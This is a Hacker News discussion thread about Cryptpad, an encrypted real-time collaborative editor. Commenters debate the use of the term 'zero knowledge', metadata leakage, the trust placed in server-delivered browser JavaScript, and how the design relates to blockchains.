Hacker News new | past | comments | ask | show | jobs | submit login
Cryptpad: Zero Knowledge, Collaborative Real Time Editing (cryptpad.fr)
137 points by zerognowl on Sept 23, 2016 | hide | past | favorite | 52 comments



Why do people insist on using the term zero knowledge for simple semantically secure encryption?

Zero knowledge has a very specific meaning inside cryptography. Encrypting something does not make it "zero knowledge".


> Why do people insist on using the term zero knowledge for simple semantically secure encryption?

Note that in the domain of privacy-enhancing technologies the term "zero-knowledge" does not refer to "semantically secure encryption". Instead it is used to mean that a service provider does not have access to user data, and that this claim can be proven cryptographically. The use of the term zero-knowledge to promote privacy-respecting services dates back to at least 1997 with the founding of the Canadian company Zero-Knowledge Systems [1], which provided anonymous communication services [2].

[1] https://en.wikipedia.org/wiki/Zero_Knowledge_Systems [2] http://edition.cnn.com/TECH/computing/9902/11/browsanon.idg/


Note that in the field of cryptography, the term zero knowledge refers to zero knowledge proofs, which predate that company by over 13 years.


I don't dispute that fact. But there is precedent for the use of the term in privacy-respecting services, so we shouldn't be surprised when we encounter it. After ZKS shut down, the term continued to be used by hosting and communications services to explain their value proposition in a simple way.

Having said that, I agree with the point that nowadays this usage may be unhelpful in promoting privacy-respecting services because zero-knowledge proofs have come a long way and there are now services like Zerocash that actually make use of them. So using the term to promote a different privacy-respecting feature may be confusing or misleading.


I wish they would pick a clearer term that's not already in use, like (as I think they mean in this case) "provider-obscured". Heck, even "homomorphic" would be better, as that signifies "does stuff you want with your data, without knowing the content of said data".


Then that is a pretty poor precedent, however I've not seen people (who actually understand cryptography or security) reference "zero knowledge" as the fact that the provider can't access your data.


Alternatively, based on my assumption that English is only a second language for the authors[1] I also think it might just be a cultural/language issue. Being a non-native english speaker myself, I frequently find myself differing in word usages with the native speakers. And there is probably no formalized naming convention (like scientific names in biology), it's what's all in people's heads. What Fowler said about naming being hard is probably very true [2].

[1]: https://github.com/xwiki-labs/cryptpad/graphs/contributors [2]: http://martinfowler.com/bliki/TwoHardThings.html


I had the same feeling when reading the copy on the site. I looked for an explanation of what they mean by the statement, but couldn't find one. Google led me to a Spider Oak page that seems to use the terminology in a similar manner [1].

I have a hard time even accepting this definition of "zero knowledge' on its own, separate from the existing cryptographic one. Wouldn't the host at least know things like the size of the encrypted data? Time it was sent? Etc.

[1] https://spideroak.com/features/zero-knowledge


File size and date sent is probably only useful if someone is specifically targeting you, and it's virtually guaranteed that the only person who wound target someone specifically and also be able to make use of that data is a government agency. In that case they'd be able to monitor your data at an ISP level anyway, making it moot. It doesn't look like Spideroak takes bitcoin payments anyway, making this even further moot. Anyone serious about privacy against state actors wouldn't use it.


Metadata is often more useful than the message, and sometimes can expose the message. For example, a collaborative editor had better not send each key press to the other editors else timing attacks can reconstruct probable text fragments etc.


I don't agree that only government agencies would care. For example, anyone on open wifi can be easily targeted. So anyone doing something at a university could be targeted. I would imagine that some corporation would be interested in something from a university enough to try this.


Useful or not, I consider the boldface statement

> we know nothing about the encrypted data you store on our servers

misleading, since they do know some things about the encrypted data.


I strongly support SpiderOak but I agree with you. Even if they don't keep logs of that stuff, they could or could be ordered to do so. They obviously think the "ordered to do so" part is a real threat because they dissuade used from logging in through the website.


I think this is a terminological suggestion from SpiderOak

https://spideroak.com/features/zero-knowledge

It's true that it doesn't match the technical meaning of zero knowledge from cryptography (although maybe arguably the meaning of the technical term could be extended to this situation in a trivial way: rather than a proof or protocol involving Bob from which Bob doesn't learn certain information, this is a protocol not involving Bob from which Bob also doesn't learn certain information).


Counter argument: https://paragonie.com/blog/2016/08/crypto-misnomers-zero-kno...

Summary: zero-knowledge applies to authentication protocols, not encryption protocols.


I think I'm inclined to agree with that interpretation. I wish we had a clearer term for systems where you don't trust an intermediary with some kind of access. (We often say "end-to-end encrypted", but that's kind of weird for file storage or other data-at-rest situations.)


> I wish we had a clearer term for systems where you don't trust an intermediary with some kind of access.

We already have one or more of:

  - Confidential
  - End-to-end encrypted (contrasted with, but often in addition to,
    transport-layer encryption)
  - Privacy-preserving
  - Least authority (with respect to the service operator)
  - Peer-to-peer privacy
I'm one degree of separation from several SpiderOak engineers and think highly of them overall. However, this choice of marketing copy is one point we vehemently disagree on.


This is a fair question. I'm somewhat to blame for contributing to it over the last 10 years via SpiderOak. There are very good reasons though, and it's probably time I made a post about it.


> There are very good reasons though,

Okay, I'd really like to hear the argument about why muddying the waters about an already-hard-to-understand subject is totally fine.

> and it's probably time I made a post about it.

Please do.

A blog post that I linked elsewhere in this thread makes the case for why it's harmful.


I know this is just a proof of concept demo, but the "Code Pad" mode is built on CodeMirror and becomes unusably slow as soon as the document gets at all large (few thousand lines) perhaps due to them not implemented a range of tricks for transforming CodeMirror's content efficiently, like the setValueNoJump extension here https://github.com/sagemathinc/smc/blob/master/src/smc-webap...

DISCLAIMER: I've spent way too much time on synchronized CodeMirror editing...


Seeing as how the key is only being protected by TLS in the GET requests. You may want to tighten up your configuration. Also, patch the padding oracle vuln.

You scored an F on SSL Labs.

https://www.ssllabs.com/ssltest/analyze.html?d=beta.cryptpad...

I like the idea though! :)


Interesting idea.

I think it's kind of odd to draw such a strong comparison to the Bitcoin blockchain. As the technical description [1] points out, the "chainpad" system discards most of the features and properties that make Bitcoin secure against malicious participants. That seems like a totally reasonable design decision for this application, but then describing it as a blockchain just adds confusion.

In fact, the design seems to bear a much closer resemblance to the Bayou optimistic concurrency algorithm [2], with operational transformation as the underlying data model, and some extra crypto on top.

[1]: https://github.com/xwiki-contrib/chainpad

[2]: http://www.cs.utexas.edu/users/lorenzo/corsi/cs380d/papers/p...


Sharing the URL is essentially giving out the key, so there is no digitally safe way to do this unless you encrypt the initial message, at which stage you are using encrypted communication anyway and the URL just leaves open an attack vector. Please correct me if I am wrong.


Yes, you need an encrypted (or local) channel to share the Cryptpad URL but this can be achieved by using e.g. PGP or Signal or any other of the encrypted messengers out there. However, being able to send an encrypted message to someone is not the same as being able to collaboratively edit documents in real time (think "Google Docs") with that person.

This is where the value-added of Cryptpad lies: Yes, you need to already be able to exchange encrypted messages with your partner, but this will allow you to work on a document together in a secure[1] fashion.

For me, this is quite an achievement and not nothing.

[1]: "Secure" with all the caveats pointed out in the other comments below, e.g. if you do not self-host but use the cryptpad.fr server you need to trust them not to send malicious JavaScript to your browser.


I did not mean it was nothing, I was juts seeing if I understood how it works and the risks. But I can see how a collaborative doc would be useful, this would be a good alternative to the shared Gmail account communicate with draft messages option.


Just having encrypted communication doesn't enable collaborative document editing.

Seem to me the point is to use a secure channel to share the URL with your collaborators, and after that you can use a blockchain to host your collaborative edits instead of having to run a server.


This is a cool implementation of this idea.

Proof of work is probably an acceptable solution for proof of concept but anonymous consensus isn't needed for for collaborative document editing.

I'm still thinking if this use cases needs timestamping or atomic broadcast.If timestamping is sufficient, Google's new roughtime protocol would do the job well. Otherwise you need a proper atomic broadcast algorithim like RAFT, Tendermint, Honeybadger etc.

Great work.


There doesn't appear to be any mining, proof-of-work, anonymous consensus, or fault-tolerant consensus of any kind in this project. I think they just threw the phrase "Nakamoto blockchain" in there as inspiration, really they are just using hashchains from 1999.


I would very much like to see someone built out the transcript validation application of atomic broadcast rather than a distributed ledger version.


That's disappointing :-(



I have often seen claims that doing any kind of crypto in (browser) javascript is dangerous. Does this fall into that trap?

How can I safely share the URL to someone without already using an established encrypted communication method?

Is the encryption key stored in my browser history?


The reason crypto in the browser is dangerous is because the crypto algorithms come from the server (they aren't built into the browser) so you have to verify them every time you go to the site to know they're doing everything properly. They could easily change them to no ops for you at the request of the NSA or whatever and you wouldn't know. So on the basis of that, I don't think this project avoids that problem


iOS silently installs updates too all apps from the App Store.

There is no meaningful distinction between Javascript being served from the server and an App being served from the App Store.


I agree 100%. This means both processes are insecure, though probably it's a matter of degrees, since you at least have the apple approval process filtering out blatant fuckery


Yes. Yes they do, and I agree – there is no meaningful distinction.

https://www.gnu.org/proprietary/proprietary-back-doors.en.ht...


yes.

you can't.

and yes.


While the ideas and implementation are neat, this suffers from the chicken and egg problem[1]. You have to trust server's resources are not tampered with. Adding an event binding to tamper or siphon data before it's encrypted is simple.

[1] https://www.nccgroup.trust/us/about-us/newsroom-and-events/b...


I did something like this 3-4 years ago, it was in secretdiary.com (or .org), now with different people. The main difference is that the url fragment had two parts:

http://secretdiary.org/#IDENTIFIER-AUTOGENPASSWORD

The autogenerated password was optional (and random) and you could instead require a password. This way it was not GET-cached anywhere unless you wanted it to so you could share the actual URL anywhere with no fear of it leaking the secrets, or you could just share the whole thing similarly to cryptpad.fr

However it was one of my first projects so it didn't even had https.


Neat. Using chainpad for the basis of my next project :-)


This is pretty cool, but I believe that you still have to trust cryptpad.fr to send you javascript that won't leak.


From a glance at the GitHub page, it looks like you can self-host the project. Is "bower install" a possible attack vector as well? I'm unfamiliar with it.


Bower is a package manager for Javascript libraries.

So the only attack vector would be a MIT attack, intercepting the requests to the Bower registry.


Or a hijacked GitHub repository/maintainer?


Very good, thanks!


I'm looking forward to tptacek's commentary here given his position on in-browser crypto.


Isn't access exposed to whatever medium you use to transmit the URL?


I'd love something similar, but implemented as a browser extension.


Entering an invalid pad number redirects back to old.cryptpad.fr ?


Ok, now this is cool.


why not just make it p2p via webrtc ?


Seems cool.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: